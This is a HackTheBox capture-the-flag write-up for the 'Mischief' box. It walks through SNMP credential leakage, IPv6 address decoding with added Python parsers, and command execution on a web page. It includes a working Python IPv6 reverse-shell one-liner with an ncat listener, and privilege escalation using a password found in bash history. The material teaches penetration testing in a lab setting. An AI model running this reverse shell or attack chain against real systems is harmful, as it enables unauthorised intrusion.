
Mischief Writeup Hackthebox


Mischief is an Insane-rated box on HackTheBox that relies on thorough enumeration, on handling IPv6 addresses alongside the usual IPv4 ones, and on the SNMP protocol.

According to the Official HackTheBox document for this box the required skills are:

  • Knowledge of Web and SNMP enumeration techniques
  • Basic knowledge of IPv6 and Linux

And the skills learned:

  • Familiarity with SNMP OIDs
  • Establishment of IPv6 rev shell

Starting with a Port Scan:

Use threader3000 to quickly scan all TCP ports:

        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.10.92
------------------------------------------------------------
Scanning target 10.10.10.92
Time started: 2021-08-31 15:44:19.310994
------------------------------------------------------------
Port 22 is open
Port 3366 is open


Port scan completed in 0:01:38.716523
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,3366 -sV -sC -T4 -Pn -oA 10.10.10.92 10.10.10.92
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------

We can see that SSH (22) and port 3366 are open.

Doing a more detailed nmap scan:

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 23:11 PDT
Nmap scan report for 10.10.10.92
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
|   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
3366/tcp open  caldav  Radicale calendar and contacts server (Python BaseHTTPServer)
| http-auth: 
| HTTP/1.0 401 Unauthorized\x0D
|_  Basic realm=Test
|_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.12 seconds

Sending a request to the HTTP server on 3366 returns a 401: HTTP Basic authentication is required, and we have no credentials yet. For now more enumeration is needed.

Running a quick onesixtyone scan shows that SNMP (UDP 161) is enabled and answers to the default community string public.

There are two ways to approach this: an Nmap script scan to list the running processes over SNMP, or a fuller snmpwalk to pull both processes and IP addresses.

nmap command:

nmap -sU -p 161 --script=snmp-processes 10.10.10.92

Looking at the output of this scan, the web server's credentials are right there in the process list, passed as a command-line argument (SNMP's hrSWRunTable exposes the full argv of every process to anyone who knows the read community):

|   659: 
|     Name: python
|     Path: python
|     Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
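As an added example (my code, not part of the original writeup), the following Python script parses a raw snmpwalk of HOST-RESOURCES-MIB::hrSWRunTable (1.3.6.1.2.1.25.4.2.1, the same table nmap's snmp-processes script reads) and flags command-line arguments that look like credentials. The walk text embedded in it is constructed: the python process mirrors the entry above, the other two processes are made up for contrast.

```python
import re
from collections import defaultdict

# Column OIDs of HOST-RESOURCES-MIB::hrSWRunTable. The last OID component
# of every row is hrSWRunIndex, which on Linux is the PID.
HR_SW_RUN_NAME = "1.3.6.1.2.1.25.4.2.1.2"
HR_SW_RUN_PATH = "1.3.6.1.2.1.25.4.2.1.4"
HR_SW_RUN_PARAMETERS = "1.3.6.1.2.1.25.4.2.1.5"
COLUMNS = {HR_SW_RUN_NAME: "name", HR_SW_RUN_PATH: "path", HR_SW_RUN_PARAMETERS: "params"}

# Constructed sample in the raw snmpwalk format (no MIBs installed), as produced by
#   snmpwalk -v2c -c public 10.10.10.92 1.3.6.1.2.1.25.4.2.1
# PID 659 mirrors the process shown in the writeup; the other rows are made up.
SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.659 = STRING: "python"
iso.3.6.1.2.1.25.4.2.1.2.702 = STRING: "mysqld"
iso.3.6.1.2.1.25.4.2.1.4.1 = STRING: "/sbin/init"
iso.3.6.1.2.1.25.4.2.1.4.659 = STRING: "python"
iso.3.6.1.2.1.25.4.2.1.4.702 = STRING: "/usr/sbin/mysqld"
iso.3.6.1.2.1.25.4.2.1.5.1 = ""
iso.3.6.1.2.1.25.4.2.1.5.659 = STRING: "-m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/"
iso.3.6.1.2.1.25.4.2.1.5.702 = STRING: "--user=mysql --password=s3cret"
"""

# One raw walk line: <oid>.<pid> = [STRING: ]"value"   (empty strings print as "")
LINE_RE = re.compile(r'^(?P<oid>\S+)\.(?P<pid>\d+) = (?:STRING: )?"?(?P<val>.*?)"?$')

# A user:password token such as SimpleHTTPAuthServer takes; the guards stop
# URLs (http://...), short times (12:30) and paths from matching.
USERPASS_RE = re.compile(r'(?<![\w@:/.-])([A-Za-z0-9_.-]+):([^\s:@/]{4,})(?![\w:@/])')
# --password=x, --passwd x, --pass x, -pw x (case-insensitive)
PASSFLAG_RE = re.compile(r'--?(?:password|passwd|pass|pw)(?:=|\s+)(\S+)', re.I)


def normalize_oid(oid):
    """snmpwalk prints the root as 'iso.' or '.1.'; make both plain '1.…'."""
    if oid.startswith("iso."):
        oid = "1." + oid[4:]
    return oid.lstrip(".")


def parse_hr_sw_run(walk_text):
    """Rebuild {pid: {"name", "path", "params"}} from raw hrSWRunTable output."""
    procs = defaultdict(lambda: {"name": "", "path": "", "params": ""})
    for line in walk_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        column = COLUMNS.get(normalize_oid(m.group("oid")))
        if column is None:
            continue                      # some other column of the table
        procs[int(m.group("pid"))][column] = m.group("val")
    return dict(procs)


def find_credentials(procs):
    """Return (pid, name, user_or_None, secret) for every credential-looking argument."""
    hits = []
    for pid, proc in sorted(procs.items()):
        args = proc["params"]
        for m in USERPASS_RE.finditer(args):
            hits.append((pid, proc["name"], m.group(1), m.group(2)))
        for m in PASSFLAG_RE.finditer(args):
            hits.append((pid, proc["name"], None, m.group(1)))
    return hits


if __name__ == "__main__":
    for pid, name, user, secret in find_credentials(parse_hr_sw_run(SAMPLE_WALK)):
        print(f"pid {pid} ({name}): user={user!r} secret={secret!r}")
```

Feed it the real walk (snmpwalk output saved to a file) and the same two functions pick the loki credentials out of the SimpleHTTPAuthServer argument; the patterns are deliberately loose, so treat hits as leads to check by hand rather than as confirmed passwords.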

Logging into the web server on 3366 with these creds shows a table of credentials:

Username Password
loki godofmischiefloki
loki trickeryanddeceit

Another set of creds, but nowhere to use them. Another brick wall.

SNMP addresses its data with Object Identifiers (OIDs), a standardized numeric tree whose branches are documented in MIBs, so the interesting ones can be looked up rather than guessed.

http://www.net-snmp.org/docs/mibs/ip.html

Is a great resource for finding useful OIDs.

The one we want is 1.3.6.1.2.1.4.34.1.3 (IP-MIB::ipAddressIfIndex), which lists every address configured on the host together with the index of the interface it lives on. Running snmpwalk -v2c -c public 10.10.10.92 1.3.6.1.2.1.4.34.1.3 shows more IP addresses on the system than the one we scanned.

With the MIB files installed, this looks like:

IP-MIB::ipAddressIfIndex.ipv4."10.10.10.92" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.255" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."127.0.0.1" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:71:a4" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:71:a4" = INTEGER: 2

Without them, snmpwalk prints the raw numeric form instead, which is what you will see at first:

iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.92 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.255 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.127.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.113.164 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.185.113.164 = INTEGER: 2

Which is almost indecipherable unless you know how the index is encoded: after the column OID 1.3.6.1.2.1.4.34.1.3 come the InetAddressType (1 = IPv4, 2 = IPv6), the address length in octets (4 or 16), and then the address itself, one decimal octet per component. So 2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.113.164 is a 16-octet IPv6 address whose first four bytes are 0xde 0xad 0xbe 0xef.

To get the translated IP-MIB:: names instead, install the MIB files:

sudo apt install snmp-mibs-downloader

then edit /etc/snmp/snmp.conf and comment out the "mibs :" line, as the comment in that file directs (alternatively, pass -m ALL to snmpwalk for a single run).

Going back to the main topic, this gives us the IPv6 address shown as de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:71:a4. To do anything with it we need to write it as a valid IPv6 literal: group the 16 bytes into eight 16-bit hextets, drop the leading zeros in each, and replace the longest run of all-zero hextets with "::". The fe80:: address is link-local and only reachable from the same network segment, so the dead:beef:: one is the address to target:

dead:beef::0250:56ff:feb9:71a4
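To show the decoding done by hand above in code, here is an added Python example (mine, not from the original writeup). It parses the raw numeric ipAddressIfIndex output shown earlier (the six sample lines are copied from that output), turns each index into an address object, picks out the routable IPv6 address and recovers the MAC from the EUI-64 interface identifier, which is the same thing nmap's address-info script reports further down. It handles the raw form only, not the translated IP-MIB:: form.

```python
import ipaddress
import re

IP_ADDRESS_IF_INDEX = "1.3.6.1.2.1.4.34.1.3"   # IP-MIB::ipAddressIfIndex

# InetAddressType (RFC 4001): the first index component after the column OID.
# The "z" variants carry a 4-octet zone index after the address.
INET_TYPES = {1: "ipv4", 2: "ipv6", 3: "ipv4z", 4: "ipv6z"}

# The six raw lines from the snmpwalk output above.
SAMPLE_WALK = """\
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.92 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.255 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.127.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.113.164 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.185.113.164 = INTEGER: 2
"""

LINE_RE = re.compile(r"^(\S+) = INTEGER: (\d+)$")


def normalize_oid(oid):
    """snmpwalk prints the root as 'iso.' or '.1.'; make both plain '1.…'."""
    if oid.startswith("iso."):
        oid = "1." + oid[4:]
    return oid.lstrip(".")


def decode_inet_address(index):
    """[type, length, octet, ...] -> (ip_address, zone_index_or_None)."""
    kind = INET_TYPES.get(index[0])
    octets = index[2:]
    if kind is None:
        raise ValueError(f"unsupported InetAddressType in index: {index}")
    addr_len = 4 if kind.startswith("ipv4") else 16
    expected = addr_len + (4 if kind.endswith("z") else 0)
    if index[1] != expected or len(octets) != expected:
        raise ValueError(f"malformed InetAddress index: {index}")
    packed = bytes(octets[:addr_len])            # both classes accept packed bytes
    addr = ipaddress.IPv4Address(packed) if addr_len == 4 else ipaddress.IPv6Address(packed)
    zone = int.from_bytes(bytes(octets[addr_len:]), "big") if kind.endswith("z") else None
    return addr, zone


def parse_ip_address_table(walk_text):
    """Return [(address, zone, if_index), ...] from a raw ipAddressIfIndex walk."""
    rows = []
    for line in walk_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        oid = normalize_oid(m.group(1))
        if not oid.startswith(IP_ADDRESS_IF_INDEX + "."):
            continue
        index = [int(c) for c in oid[len(IP_ADDRESS_IF_INDEX) + 1:].split(".")]
        addr, zone = decode_inet_address(index)
        rows.append((addr, zone, int(m.group(2))))
    return rows


def scan_targets(rows):
    """IPv6 addresses worth scanning: skip loopback and fe80::/10, since
    link-local addresses are only reachable on the same L2 segment, not across the VPN."""
    return [a for a, _zone, _if in rows
            if a.version == 6 and not a.is_loopback and not a.is_link_local]


def mac_from_eui64(addr):
    """Recover the MAC from a SLAAC (modified EUI-64) interface identifier.
    Returns None when the low 64 bits do not carry the ff:fe marker."""
    if addr.version != 6:
        return None
    iid = addr.packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    octets = bytearray(iid[:3] + iid[5:])
    octets[0] ^= 0x02                          # undo the universal/local bit flip
    return ":".join(f"{b:02x}" for b in octets)


if __name__ == "__main__":
    rows = parse_ip_address_table(SAMPLE_WALK)
    for addr, zone, if_index in rows:
        print(f"if {if_index}: {addr}" + (f" zone {zone}" if zone is not None else ""))
    for target in scan_targets(rows):
        print(f"target: http://[{target}]/  (MAC {mac_from_eui64(target)})")
```

The ipaddress module does the hextet grouping and "::" compression for us, so the dead:beef line comes out as dead:beef::250:56ff:feb9:71a4, the form nmap prints; the MAC it recovers (00:50:56:b9:71:a4, a VMware OUI) matches the address-info host script output below.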

Running an IPv6 Nmap scan against this address (nmap needs the -6 flag to take an IPv6 target) shows an open HTTP server on port 80 that was not reachable over IPv4:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 23:38 PDT
Nmap scan report for dead:beef::250:56ff:feb9:71a4
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
|   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info: 
|   IPv6 EUI-64: 
|     MAC address: 
|       address: 00:50:56:b9:71:a4
|_      manuf: VMware

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.97 seconds

To reach the web server in a browser, the IPv6 literal has to be wrapped in square brackets, otherwise the colons would be read as the host:port separator:

http://[dead:beef::250:56ff:feb9:71a4] should work.

The creds from the other site do not work here, so a different username must be needed. Trying the common username administrator with one of the passwords gathered so far works and brings us to a page that lets us run commands on the box:

So do we just read the flag through this command execution? No. Commands like ls and cat do not work, so we cannot read the file that way, and the usual bash reverse shell does not come back either. Python is installed, though, and since the box talks to us over IPv6, a Python reverse shell over IPv6 gets us out:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<IPv6_ADDRESS>",<PORT>,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Here <IPv6_ADDRESS> is your own IPv6 address on the VPN interface and <PORT> the listener port. An AF_INET6 socket address is the 4-tuple (host, port, flowinfo, scope_id): the trailing 0,2 sets flowinfo to 0 and scope_id to 2, the target's interface index from the SNMP output (only strictly needed for link-local destinations, harmless for a global one).

One thing to note: the stock nc on Kali did not catch the shell. Ncat (from the nmap project) does, since it listens on both IPv4 and IPv6 by default, and it installs with sudo apt install ncat.

Then catch the shell with rlwrap ncat -nlvp 1337 (add -6 to restrict the listener to IPv6).

rlwrap wraps the listener in readline so the arrow keys and command history work inside the shell. More details: https://github.com/hanslub42/rlwrap

Checking the credentials file in loki's home directory gives us: lokiisthebestnorsegod

This can be used to SSH into the box as loki and get the user flag.

Root:

Log in as loki and check the bash history:

loki@Mischief:~$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history 
nano .bash_history 
exit

A new password, lokipasswordmischieftrickery, with nowhere obvious to use it. Maybe root?

loki is not allowed to run su, so we cannot test it from that account, but www-data in the reverse shell can.

Running su with this password from the www-data shell gives us a root shell.

Reading /root/root.txt does not give the flag: the file only says that the flag is somewhere else and that we need to get a shell to find it.

The real root.txt can be located simply with find / -name root.txt